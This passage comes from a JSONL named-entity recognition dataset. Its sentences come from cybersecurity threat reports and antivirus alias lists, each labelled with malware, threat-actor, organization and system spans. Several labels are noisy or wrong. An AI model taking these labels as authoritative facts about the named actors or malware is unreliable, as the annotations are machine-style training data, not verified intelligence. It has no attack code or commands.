Worm[Email]/Win32.Fearso Worm:Win32/Nofear.C@mm Worm.Fearo Email-Worm.Win32.Fearso.c Worm.Fearso W32/Fearso.V.worm I-Worm.Farex.Y Win32/Farex.Y 
Trojan.Win32.Fearso.c I-Worm.Fearso!qiaAnheOcEc Worm.Win32.Nofear.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007124", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9925 Trojan.Win32.Yakes.vpge TR/Crypt.ZPACK.jrfyx Trojan:Win64/Carberp.A!bit Trojan.Win32.Yakes.vpge", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007125", "source": "cyner2_train"}} {"text": "A worm that spreads by copying itself to file shares and removable drives.", "spans": {"MALWARE: worm": [[2, 6]], "SYSTEM: removable drives.": [[57, 74]]}, "info": {"id": "cyner2_train_007126", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.MSIL Win32.Trojan.WisdomEyes.16070401.9500.9554 Trojan.Win32.Mlw.eugajo Trojan.Win32.Z.Firsot.3520512 W32/Trojan.KPJB-2397 Backdoor:MSIL/Firsot.A Trj/CI.A Backdoor.MSIL.Firsot Win32/Trojan.289", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007127", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Kazy.D1D724 W32/Trojan.PVRS-3848 Trojan.Win32.PcClient.eptxte Trojan.Win32.Z.Pcclient.356864 BackDoor.PcClient.6543 Trojan.Reconyc.Win32.20285 BehavesLike.Win32.Dropper.fc Trojan.Win32.Krypt Trojan.Reconyc.gyp TR/Crypt.ZPACK.igurt Trojan[DDoS]/Win32.Macri TrojanDownloader:Win32/Redosdru.F!bit Trojan/Win32.Infostealer.R206663 TrojanDDoS.Macri Trj/CI.A W32/Kryptik.FQKI!tr Win32/Trojan.443", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007129", "source": "cyner2_train"}} {"text": "One interesting new fact about Gaza cybergang activities is that they are actively sending malware files to IT Information Technology and IR Incident Response staff; this is also obvious from the file names they are sending to victims, which reflect the IT functions or IR tools used in cyber attack investigations.", "spans": {"THREAT_ACTOR: Gaza cybergang": [[31, 45]], "ORGANIZATION: IT Information 
Technology": [[108, 133]], "ORGANIZATION: IR Incident Response staff;": [[138, 165]]}, "info": {"id": "cyner2_train_007130", "source": "cyner2_train"}} {"text": "Once delivered, Escelar has multiple installation stages where malware is downloaded using direct connections to multiple Microsoft SQL servers.", "spans": {"MALWARE: Escelar": [[16, 23]], "MALWARE: malware": [[63, 70]], "SYSTEM: multiple Microsoft SQL servers.": [[113, 144]]}, "info": {"id": "cyner2_train_007131", "source": "cyner2_train"}} {"text": "However, unlike Dyre which was designed to target banking information, Rombertik collects information from all websites in an indiscriminate manner.", "spans": {"MALWARE: Dyre": [[16, 20]], "ORGANIZATION: banking information,": [[50, 70]], "MALWARE: Rombertik": [[71, 80]]}, "info": {"id": "cyner2_train_007132", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Heur.DP.E18DA6 Win32.Trojan.WisdomEyes.16070401.9500.9999 W32.W.Dorifel.moev TrojWare.Win32.Delf.OSP1 Trojan.DownLoad1.16614 Trojan-Downloader.Win32.Rochap TR/Dldr.Rochap.J Trojan/Win32.Unknown TrojanDropper:Win32/Rochap.H Win32/Delf.OSP W32/Dropper.VFR!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007133", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Downloader.Harnig.al Trojan-Downloader.Win32.Harnig!O Downloader.Small.28090 Trojan/Downloader.Harnig.al Win32.Trojan.WisdomEyes.16070401.9500.9939 Downloader.Trojan Win.Downloader.Small-579 Trojan.Downloader.Harnig.al Trojan-Downloader.Win32.Harnig.al Trojan.Downloader.Harnig.al Trojan.Win32.Harnig.voqq Trojan.Win32.A.Downloader.10240.FS Troj.Downloader.W32.Harnig.al!c Trojan.Downloader.Harnig.al TrojWare.Win32.TrojanDownloader.Harnig.AL Trojan.Downloader.Harnig.al Trojan.DownLoader.919 Downloader.Harnig.Win32.353 BehavesLike.Win32.Cutwail.lt Trojan-Downloader.Win32.Harnig Trojan/Startpage.nv W32.Trojan.Downloader.Harnig Trojan[Downloader]/Win32.Harnig Trojan.Downloader.Harnig.al 
Trojan-Downloader.Win32.Harnig.al Trojan/Win32.Downloader.R39433 Trojan.Downloader.Harnig.al OScope.Downloader.GCLA Trj/Harnig.AD Win32/TrojanDownloader.Harnig.AL Win32.Trojan-downloader.Harnig.Sxyp Trojan.QHost.L W32/Harnig.AI!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007134", "source": "cyner2_train"}} {"text": "This campaign involved five separate phishing attacks, each carrying a different variant of Sysget malware, also known as HelloBridge.", "spans": {"THREAT_ACTOR: campaign": [[5, 13]], "MALWARE: Sysget malware,": [[92, 107]], "MALWARE: HelloBridge.": [[122, 134]]}, "info": {"id": "cyner2_train_007135", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.SkipnetA.Trojan Trojan.VB W32/Bybz.ehk Trojan.IPZ.3 Win32.Trojan.WisdomEyes.16070401.9500.9995 TROJ_VB_GA2509B6.UVPM Win.Trojan.Injector-397 Trojan.Win32.AutoRun.thcnx Worm.Win32.AutoRun.dck Trojan.MulDrop2.2467 Worm.Bybz.Win32.935 TROJ_VB_GA2509B6.UVPM BehavesLike.Win32.VBobfus.dc Trojan/Cosmu.gzo W32/Llac.PMC!tr Worm/Win32.Bybz Worm.Win32.A.AutoRun.206367 Worm/Win32.AutoRun.C11891 PWS-Spyeye.ai OScope.Worm.Bybz.31321 Worm.Bybz!gMC6zzOscGs Backdoor.Win32.Poison", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007136", "source": "cyner2_train"}} {"text": "These tools included utilities from Microsoft Sysinternals and parts of open-source projects.", "spans": {"MALWARE: tools": [[6, 11]], "SYSTEM: Microsoft Sysinternals": [[36, 58]], "SYSTEM: open-source projects.": [[72, 93]]}, "info": {"id": "cyner2_train_007137", "source": "cyner2_train"}} {"text": "To distribute the malicious excel file, the attackers registered a domain which impersonated the identity of most influential Indian think tank IDSA Institute for Defence Studies and Analyses and used the email id from the impersonating domain to send out the spear-phishing emails to the victims.", "spans": {"THREAT_ACTOR: attackers": [[44, 53]], "ORGANIZATION: think tank IDSA Institute 
for Defence Studies and Analyses": [[133, 191]], "ORGANIZATION: victims.": [[289, 297]]}, "info": {"id": "cyner2_train_007139", "source": "cyner2_train"}} {"text": "The malware appears to have been named Hinata by the malware author after a character from the popular anime series, Naruto.", "spans": {"MALWARE: malware": [[4, 11]], "THREAT_ACTOR: Hinata": [[39, 45]], "THREAT_ACTOR: the malware author": [[49, 67]]}, "info": {"id": "cyner2_train_007142", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9964 Infostealer.Gampass Trojan-GameThief.Win32.OnLineGames.jez Trojan.Win32.OnLineGames.csyqf Trojan.PWS.Gamania.6047 BehavesLike.Win32.BadFile.lc Trojan-PWS.OnlineGames Trojan/PSW.OnLineGames.cqju Win32.PSWTroj.OnLineGames.kcloud Trojan-GameThief.Win32.OnLineGames.jez Trojan/Win32.OnlineGameHack.R6228 TScope.Malware-Cryptor.SB Win32/PSW.OnLineGames.HCV", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007144", "source": "cyner2_train"}} {"text": "A backdoor also known as: Bck/DSNX.05 Bloodhound.Morphine Trojan.Packed-86 Backdoor.Win32.DSNX.05.a Backdoor.Dsnx.05.A Backdoor.Win32.DSNX.05.a Backdoor:Win32/DSNX.E Backdoor.DSNX.05.a BackDoor.Dsnx Backdoor.DSNX.05 Bck/DSNX.05 Trojan.Dsnx Trojan-Spy.Win32.Flux.a Win32/DSNX.05 Bck/DSNX.05", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007145", "source": "cyner2_train"}} {"text": "In July 2014, Trend Micro published a report about a threat called Retefe, an ebanking Trojan that is targeting financial institutions in Switzerland, Austria, Sweden and Japan.", "spans": {"ORGANIZATION: Trend Micro": [[14, 25]], "MALWARE: Retefe,": [[67, 74]], "MALWARE: ebanking Trojan": [[78, 93]], "ORGANIZATION: financial institutions": [[112, 134]]}, "info": {"id": "cyner2_train_007147", "source": "cyner2_train"}} {"text": "Based on other public reports, SANs saw the expected Qakbot activity.", "spans": {"ORGANIZATION: SANs": [[31, 35]], 
"MALWARE: Qakbot": [[53, 59]]}, "info": {"id": "cyner2_train_007148", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Regin.A Trojan.Regin Backdoor.Regin.A Trojan/Downloader.Tiny.br Backdoor.Regin.A W32/Backdoor.NAZD-1177 Backdoor.Regin Backdoor.Regin.A Backdoor.Regin.A Backdoor.Regin.A Heur.Packed.Unknown Backdoor.Regin.A Virus.Win32.Dion.b TR/Regin.qzqib Trojan:WinNT/Regin.A!dha Trj/CI.A Win32/Trojan.2d3", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007149", "source": "cyner2_train"}} {"text": "A backdoor also known as: Hacktool.Paycrack Trojan/Hacktool.PayCrack.a W32/Trojan.TVD Win32/HackTool.PayCrack.A HackTool.Win32.PayCrack.a Riskware.Win32.PayCrack.hsmb Win32.Hacktool.Paycrack.Amwe Application.Win32.HackTool.PayCrack.A Tool.PayCrack.Win32.1 W32/Trojan.IFEJ-8553 HackTool.PayCrack.a Malware_fam.gw HackTool/Win32.PayCrack Win32.HackTool.PayCrack.a.kcloud Trojan.Kazy.D2127B HackTool.W32.PayCrack.a!c HackTool.Win32.PayCrack.a HackTool:Win32/Paycrack.A Trojan.VBRA.03914 HackTool.PayCrack!/HSSYr26Jv4", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007150", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/W32.Rootkit.13224.C Win32.Trojan.KillAV.aa Trojan.Win32.NtRootKit.crkykj Trojan.NtRootKit.12298 Trojan.Zusy.75 Trojan:WinNT/Kernelpatch.A Trojan.Win32.KillAV", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007151", "source": "cyner2_train"}} {"text": "A backdoor also known as: TrojanDownloader.Mariofev Dropper.Drooptroop.Win32.3960 Trojan/Dropper.Drooptroop.jqh Trojan.TDss.50 Win32.Trojan.WisdomEyes.16070401.9500.9998 W32/MalwareF.QVRD TROJ_DROPPER.OFB Trojan.Win32.Drooptroop.cphrc Backdoor.Win32.Shiz.A Trojan.DownLoader1.42134 TROJ_DROPPER.OFB BehavesLike.Win32.Ramnit.mc W32/Risk.VWDX-4897 TrojanDropper.Drooptroop.cvo W32.Malware.Downloader TrojanDownloader:Win32/Mariofev.B Win-Trojan/Drooptroop.29184 Trojan.SB.01742 Trj/Sinowal.WXO 
Win32.Trojan-dropper.Drooptroop.Suxo Trojan.DR.Drooptroop!YuxRFC8vqfA Win32/Trojan.Downloader.5d7", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007152", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.HfsAutoB.6E94 Dropped:Backdoor.Hupigon.AACP Backdoor.Delf.13917 Backdoor.Delf.Win32.18733 Trojan/Ceckno.nag Backdoor.Hupigon.AACP Win32.Trojan.Hupigon.b Win.Trojan.Crypted-5 Backdoor.Win32.Delf.cxe Dropped:Backdoor.Hupigon.AACP Trojan.Win32.Delf.ivaq Backdoor.W32.Delf.lqj!c Win32.Backdoor.Delf.Lkxm Dropped:Backdoor.Hupigon.AACP Packed.Win32.Klone.~KE Dropped:Backdoor.Hupigon.AACP BackDoor.Beizhu.origin Trojan.Win32.Cosmu VirTool.MaskPE.f Trojan[Backdoor]/Win32.Delf PWS:Win32/Populf.E!dll Dropped:Backdoor.Hupigon.AACP Backdoor/Win32.Delf.C195770 Dropped:Backdoor.Hupigon.AACP TScope.Trojan.Delf Backdoor.Delf!JSU0HMDt5JA W32/PEMask.A!tr Win32/Backdoor.Hupigon.88a", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007153", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Tosct BKDR_WEBRV.A Win32.Trojan.WisdomEyes.16070401.9500.9995 BKDR_WEBRV.A W32/Trojan.FUQN-2612 W32.Trojan.Downloader Trojan.Heur.RP.EBE28B Backdoor:Win32/Tosct.A W32/Dloader.GQ!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007154", "source": "cyner2_train"}} {"text": "The spam messages we observed used several different tactics to deliver malicious payloads to users, including macros, packager shell objects aka OLE objects, and links.", "spans": {"MALWARE: malicious payloads": [[72, 90]], "MALWARE: macros, packager shell objects": [[111, 141]]}, "info": {"id": "cyner2_train_007155", "source": "cyner2_train"}} {"text": "In this blog we begin with data from a real attack in the wild, and use the evidence from that attack to make a connection back to underground forums and the actors who are using them.", "spans": {"THREAT_ACTOR: underground forums": [[131, 149]], "THREAT_ACTOR: 
actors": [[158, 164]]}, "info": {"id": "cyner2_train_007156", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Gatt.A Backdoor.Small.oo Backdoor/Small.oo W32/Trojan.AVEH Infostealer.Onlinegame BKDR_SMALL.ALN Trojan.Downloader-17400 Backdoor.Win32.Small.oo Trojan.Gatt.A Trojan.Win32.Veslorn!IK Trojan.Gatt.A DDoS.Bonke BKDR_SMALL.ALN W32/Trojan.AVEH Trojan.Gatt.A Win-Trojan/Xema.variant Backdoor.Win32.Small.oo Trojan-PSW.Onlinegame Backdoor.Pina.k Trojan.Win32.Veslorn", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007158", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.KillProc.33379 Trojan.Foreign.Win32.54666 Trojan[Ransom]/Win32.Foreign TrojanDropper:Win32/Rovnix.N W32/Kryptik.DDLY!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007160", "source": "cyner2_train"}} {"text": "He told Amnesty International: one of my colleagues called me…and said I received an email from you and you're mentioning something about political prisoners and there is an attachment there.", "spans": {"ORGANIZATION: Amnesty International:": [[8, 30]], "ORGANIZATION: colleagues": [[41, 51]]}, "info": {"id": "cyner2_train_007161", "source": "cyner2_train"}} {"text": "In the summer of 2015, Fidelis Cybersecurity had the opportunity to analyze a Derusbi malware sample used as part", "spans": {"ORGANIZATION: Fidelis Cybersecurity": [[23, 44]], "MALWARE: Derusbi malware": [[78, 93]]}, "info": {"id": "cyner2_train_007163", "source": "cyner2_train"}} {"text": "Recent samples are shown to infect Windows hosts with the NetSupport Manager remote access tool RAT.", "spans": {"SYSTEM: Windows hosts": [[35, 48]], "MALWARE: the NetSupport Manager remote access tool RAT.": [[54, 100]]}, "info": {"id": "cyner2_train_007165", "source": "cyner2_train"}} {"text": "Tracking Subaat: Targeted Phishing Attacks Point Leader to Threat Actor's Repository", "spans": {"MALWARE: Subaat:": [[9, 16]], "THREAT_ACTOR: Threat 
Actor's": [[59, 73]]}, "info": {"id": "cyner2_train_007168", "source": "cyner2_train"}} {"text": "Following their activities and evolving tactics and techniques helped us uncover the proverbial red string of fate that connected three seemingly disparate campaigns: PLEAD, Shrouded Crossbow, and of late, Waterbear.", "spans": {"THREAT_ACTOR: campaigns: PLEAD, Shrouded Crossbow,": [[156, 192]], "THREAT_ACTOR: Waterbear.": [[206, 216]]}, "info": {"id": "cyner2_train_007169", "source": "cyner2_train"}} {"text": "Following the seemingly quiet state of point-of-sale PoS malware these past few months, we are now faced with two new PoS malware named Katrina and CenterPoS now available to cybercriminals.", "spans": {"MALWARE: point-of-sale PoS malware": [[39, 64]], "MALWARE: PoS malware": [[118, 129]], "MALWARE: Katrina": [[136, 143]], "MALWARE: CenterPoS": [[148, 157]], "THREAT_ACTOR: cybercriminals.": [[175, 190]]}, "info": {"id": "cyner2_train_007170", "source": "cyner2_train"}} {"text": "We recently wrote about the KONNI Remote Access Trojan RAT which has been distributed by a small number of campaigns over the past 3 years.", "spans": {"MALWARE: KONNI Remote Access Trojan RAT": [[28, 58]], "THREAT_ACTOR: campaigns": [[107, 116]]}, "info": {"id": "cyner2_train_007171", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Virut.G W32/Virut.CF_2 Win32/Virut.17408 PE_VIRUX.F-1 Virus.Win32.Virut.ce Win32.Virut.AL Virus.Win32.Virut.Ce Win32.Virut.56 PE_VIRUX.F-1 Win32/Virut.bn Trojan:Win32/Ertfor.A Virus.Virut.06 HeurEngine.MaliciousPacker Win32/Virut.NBP W32/PackTDss.W!tr W32/Sality.AO", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007172", "source": "cyner2_train"}} {"text": "During our research into a widespread spam campaign, we discovered yet another POS malware that we've named NitlovePOS.", "spans": {"THREAT_ACTOR: spam campaign,": [[38, 52]], "MALWARE: POS malware": [[79, 90]], "MALWARE: NitlovePOS.": [[108, 119]]}, "info": 
{"id": "cyner2_train_007173", "source": "cyner2_train"}} {"text": "A backdoor also known as: Worm.Win32.VB!O W32/Autorun.worm.aba Win32.Trojan.WisdomEyes.16070401.9500.9993 W32.SillyFDC Trojan-Dropper.Win32.Dapato.ddfx Trojan.Win32.Dapato.efldrk Win32.HLLW.Autoruner.10315 Worm.VB.Win32.2517 W32/Autorun.worm.aba Worm.Win32.VB Worm/VB.pfc W32.Worm.Sphr Worm/Win32.VB Worm.VB.kcloud Worm:Win32/Dashvolex.A Trojan.Strictor.DCDB Trojan-Dropper.Win32.Dapato.ddfx Worm/Win32.VB.C95007 Trojan.VBO.014708 Worm.VB!8247fVrcIiA W32/VB.OAN!tr Win32/Trojan.Dropper.d0e", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007174", "source": "cyner2_train"}} {"text": "The Carbanak group is infamous for infiltrating various financial institutions, and stealing millions of dollars by learning and abusing the internals of victim payment processing networks, ATM networks and transaction systems.", "spans": {"THREAT_ACTOR: The Carbanak group": [[0, 18]], "ORGANIZATION: financial institutions,": [[56, 79]], "SYSTEM: ATM networks": [[190, 202]], "SYSTEM: transaction systems.": [[207, 227]]}, "info": {"id": "cyner2_train_007175", "source": "cyner2_train"}} {"text": "This blog discusses targeted attacks against the Middle East taking place between February and October 2017 by a group Unit 42 is naming MuddyWater", "spans": {"THREAT_ACTOR: group": [[113, 118]], "ORGANIZATION: Unit 42": [[119, 126]], "MALWARE: MuddyWater": [[137, 147]]}, "info": {"id": "cyner2_train_007176", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Dtr.1.4.4 Backdoor.DTR BackDoor-WF.svr.rmv Email-Worm.Win32.GOPworm.196 Backdoor.Dtr.1.4.4 W32/Risk.RVZV-3966 Backdoor.Trojan Win32/DTR.14.rmvr BKDR_WF.SVR Backdoor.Dtr.1.4.4 Backdoor.Dtr.1.4.4 Trojan.Win32.Dtr.zmvuu Backdoor.Dtr.1.4.4 Backdoor.Win32.DTR.14.rmvr BackDoor.Dtr.143 Backdoor.Win32.C01A9ACD BackDoor-WF.svr.rmv W32.DTR.B BDS/Dtr.1.4.4 Backdoor:Win32/DTR.B Backdoor.Dtr.1.4.4 Email-Worm.Win32.GOPworm.196 Win32.Trojan.Wf.Pefg 
Backdoor.WF!ynwdN87+ujc Trojan.Win32.DTR W32/Bdoor.WH!tr.bdr Win32/Backdoor.9a4", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007177", "source": "cyner2_train"}} {"text": "In this attack, AutoIT was utilized to install a Remote Access Trojan RAT and maintain persistence on the host in a manner that's similar to normal administration activity.", "spans": {"MALWARE: AutoIT": [[16, 22]], "MALWARE: a Remote Access Trojan RAT": [[47, 73]]}, "info": {"id": "cyner2_train_007178", "source": "cyner2_train"}} {"text": "This report contained a sentence of particular interest to Cyber4Sight: FIN7 is referred to by many vendors as Carbanak Group,' although we do not equate all usage of the Carbanak backdoor with FIN7. In their previous report on this threat actor group, FireEye stopped short of making this direct connection, stating instead that The use of the CARBANAK malware in FIN7 operations also provides limited evidence that these campaigns are linked to previously observed CARBANAK operations leading to fraudulent banking transactions, ATM compromise, and other monetization schemes.", "spans": {"THREAT_ACTOR: Cyber4Sight: FIN7": [[59, 76]], "THREAT_ACTOR: Carbanak Group,'": [[111, 127]], "MALWARE: the Carbanak backdoor": [[167, 188]], "THREAT_ACTOR: FIN7.": [[194, 199]], "THREAT_ACTOR: threat actor group,": [[233, 252]], "ORGANIZATION: FireEye": [[253, 260]], "MALWARE: CARBANAK malware": [[345, 361]], "THREAT_ACTOR: FIN7 operations": [[365, 380]], "THREAT_ACTOR: campaigns": [[423, 432]], "THREAT_ACTOR: CARBANAK operations": [[467, 486]]}, "info": {"id": "cyner2_train_007179", "source": "cyner2_train"}} {"text": "UNIX-based operating systems are widely used in servers, workstations, and even mobile devices.", "spans": {"SYSTEM: UNIX-based operating systems": [[0, 28]], "SYSTEM: servers, workstations,": [[48, 70]], "SYSTEM: mobile devices.": [[80, 95]]}, "info": {"id": "cyner2_train_007180", "source": "cyner2_train"}} {"text": "I.e., malicious 
email messages are sent to selected targets rather than random mass distribution, but are not tailored specifically to each and every target.", "spans": {}, "info": {"id": "cyner2_train_007181", "source": "cyner2_train"}} {"text": "A backdoor also known as: Worm.Win32.AutoDoor!O Worm.AutoDoor Trojan.Win32.Buzus Win32.Trojan.WisdomEyes.16070401.9500.9827 W32/Trojan2.CWJR W32.IRCBot Win32/DfInject.CI TROJ_BUZUS.JW Win.Trojan.Buzus-2971 Worm.Win32.AutoDoor.fd Trojan.Win32.Buzus.qvdn Trojan.Win32.Buzus.48128 TrojWare.Win32.Buzus.~BAAM Trojan.MulDrop.27694 Trojan.Buzus.Win32.5559 TROJ_BUZUS.JW BehavesLike.Win32.Worm.cz Trojan/Buzus.esq Trojan/Win32.Buzus Trojan:Win32/Buzus.A Worm.Win32.AutoDoor.fd Trojan/Win32.Buzus.C140550 Trojan.Win32.Buzus.ck Trojan.Win32.Buzus Trj/Buzus.ER Virus.Win32.Virut.ue Worm.Win32.AutoDoor W32/Injector.fam!tr Win32/Worm.07d", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007182", "source": "cyner2_train"}} {"text": "A backdoor also known as: TrojanPWS.Mintluks.FC.1419 Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Win32.Inject.dhybnf Trojan.DownLoader11.61306 PWS:MSIL/Mintluks.A Trojan.Razy.D2D0CD MSIL.Trojan.Injector.HD Backdoor.Bot Trojan.MSIL.Injector Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007187", "source": "cyner2_train"}} {"text": "The Patchwork attack group has been targeting more than just government-associated organizations.", "spans": {"ORGANIZATION: government-associated organizations.": [[61, 97]]}, "info": {"id": "cyner2_train_007188", "source": "cyner2_train"}} {"text": "It is usually used as a downloader for the actual binary payload.", "spans": {"MALWARE: downloader": [[24, 34]], "MALWARE: the actual binary payload.": [[39, 65]]}, "info": {"id": "cyner2_train_007189", "source": "cyner2_train"}} {"text": "However, over a period of just over two weeks June 10 to June 28, we saw a recurrence of this threat.", "spans": {"MALWARE: threat.": [[94, 101]]}, 
"info": {"id": "cyner2_train_007190", "source": "cyner2_train"}} {"text": "Hundreds of malware samples have been used, most are Remote Access Trojans and keyloggers.", "spans": {"MALWARE: malware": [[12, 19]], "MALWARE: Remote Access Trojans": [[53, 74]], "MALWARE: keyloggers.": [[79, 90]]}, "info": {"id": "cyner2_train_007191", "source": "cyner2_train"}} {"text": "The attackers initially injected a malicious user-defined function Downloader.Chikdos into servers in order to compromise them with the Trojan.Chikdos.A DDoS malware According to Symantec telemetry, the majority of the compromised servers are in India, followed by China, Brazil and the Netherlands.", "spans": {"THREAT_ACTOR: attackers": [[4, 13]], "SYSTEM: servers": [[91, 98]], "MALWARE: DDoS malware": [[153, 165]], "ORGANIZATION: Symantec telemetry,": [[179, 198]], "SYSTEM: compromised servers": [[219, 238]]}, "info": {"id": "cyner2_train_007192", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Retefe W32/Trojan.IYLJ-0833 Ransom.Cry Trojan.Win32.Banker1.euqajf TrojWare.Win32.Amtar.TAW Trojan.PWS.Banker1.23740 Trojan.Adware.a Trojan/Win32.Injector.C2217431 Trj/CI.A Win32.Trojan.Fakeversign.Vgov Win32/Trojan.Adware.37e", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007193", "source": "cyner2_train"}} {"text": "A backdoor also known as: TrojanProxy.Roficor W32/Trojan.GIFJ-9110 Win32/Tnega.TOWATOC TrojanProxy:Win32/Roficor.A Win32.Trojan.Falsesign.Duco", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007194", "source": "cyner2_train"}} {"text": "Adwind is a Java-based remote access tool RAT used by malware authors to infect computers with backdoor access.", "spans": {"MALWARE: Adwind": [[0, 6]], "MALWARE: Java-based remote access tool RAT": [[12, 45]], "THREAT_ACTOR: malware authors": [[54, 69]], "SYSTEM: computers": [[80, 89]], "MALWARE: backdoor access.": [[95, 111]]}, "info": {"id": "cyner2_train_007195", "source": "cyner2_train"}} 
{"text": "All modules set hidden attributes to their files : Module Paths Exfiltrated data format msconf.exe % APPDATA % /myupd/gen/ % Y % m % d- % H % M % S_filesystem.zip ( file structure dump ) system.exe % APPDATA % /myupd/aud/ % d % m % Y % H % M % S.wav ( surrounding sounds ) update.exe % APPDATA % /myupd_tmp/txt/ % APPDATA % /myupd/txt/ % Y % m % d- % H % M % S.txt ( keylogging ) wow.exe % APPDATA % /myupd/scr/ % Y % m % d- % H % M % S.jpg ( screenshots ) skype_sync2.exe % APPDATA % /myupd_tmp/skype/ % APPDATA % /myupd/skype/ yyyyMMddHHmmss_in.mp3 yyyyMMddHHmmss_out.mp3 ( skype calls records ) Moreover , we found one module written in .Net – skype_sync2.exe .", "spans": {"SYSTEM: .Net": [[640, 644]]}, "info": {"id": "cyner2_train_007196", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/W32.Scar.995328.O Trojan/Scar.dzrv Win32.Trojan.WisdomEyes.16070401.9500.9996 Trojan.Bayrob Trojan.Win32.Scar.cpddg Troj.W32.Scar.dzrv!c Trojan.Scar.Win32.50507 BehavesLike.Win32.GameVance.dt Trojan/Scar.bagk TR/Woripecs.A.48 Trojan.Heur.JP.EFC713 Backdoor:Win32/Nivdort.A!dll Trojan/Win32.Bayrob.C236811 Trojan.Scar!yb6+goUnDvM Trojan.Win32.Woripecs W32/Scar.AT!tr Win32/Trojan.Spy.84a", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007198", "source": "cyner2_train"}} {"text": "The spreading method of a fake antivirus website was also quite confusing, normally I see these things dropping FakeAV's as I've written on in the past.", "spans": {}, "info": {"id": "cyner2_train_007200", "source": "cyner2_train"}} {"text": "Some of Regin's custom payloads point to a high level of specialist knowledge in particular sectors, such as telecoms infrastructure software, on the part of the developers.", "spans": {"MALWARE: Regin's custom payloads": [[8, 31]], "ORGANIZATION: telecoms infrastructure software,": [[109, 142]]}, "info": {"id": "cyner2_train_007201", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Tagazie.Trojan 
Trojan/W32.Small.36864.ACH Trojan.Win32.Scar!O TrojanDownloader.Bredolab.AJ2 Virus.Virut.Win32.1911 Trojan/Scar.eaml Win32.Trojan.WisdomEyes.16070401.9500.9999 TROJ_SCAR_0000027.TOMA Trojan.Win32.Scar.eaml Trojan.Win32.Scar.djhme Trojan.Win32.Scar.9216.A Trojan.Win32.Scar.eaml Trojan.Proxy.19837 BehavesLike.Win32.PWSZbot.nc Trojan/Scar.airi Trojan/Win32.Scar Trojan:Win32/Hioles.D Troj.W32.Scar.lrnw Trojan.Win32.Scar.eaml Trojan/Win32.Scar.R7877 Worm.Fakeupdate.2821 Win32.Magistr Trojan.Scar!QrzKm85lu1k Trojan.Win32.Comame", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007202", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Script.634117 Trojan.Win32.Miner!O Win32.Trojan.WisdomEyes.16070401.9500.9944 PUA.Deminnix Trojan.Win32.Miner.aau Trojan.Script.634117 Riskware.Win32.BitCoinMiner.csteyy Trojan.Script.634117 Tool.BtcMine.83 Trojan.Miner.Win32.426 W32/Trojan.IJIB-0603 Trojan/Miner.dc Trojan.Graftor.D194A6 Trojan.Win32.Miner.aau Trojan.BitMiner Win32/CoinMiner.EC Riskware.BitCoinMiner!FKk5sgQEcRQ Trojan.Win32.Deminnix", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007203", "source": "cyner2_train"}} {"text": "The investigations showed that the attacks shared a number of common features, such as involving large amount of monetary loss originating from what initially appeared to be legitimate bank customer accounts.", "spans": {}, "info": {"id": "cyner2_train_007205", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.eHeur.Malware03 Trojan.Kimad.19394 Trojan/Downloader.Stantinko.o TROJ_KIMAD_EK04051A.UVPM Win32.Trojan-Downloader.Stantinko.a TROJ_KIMAD_EK04051A.UVPM Win.Trojan.12288703-1 Trojan.Kbdmai.14 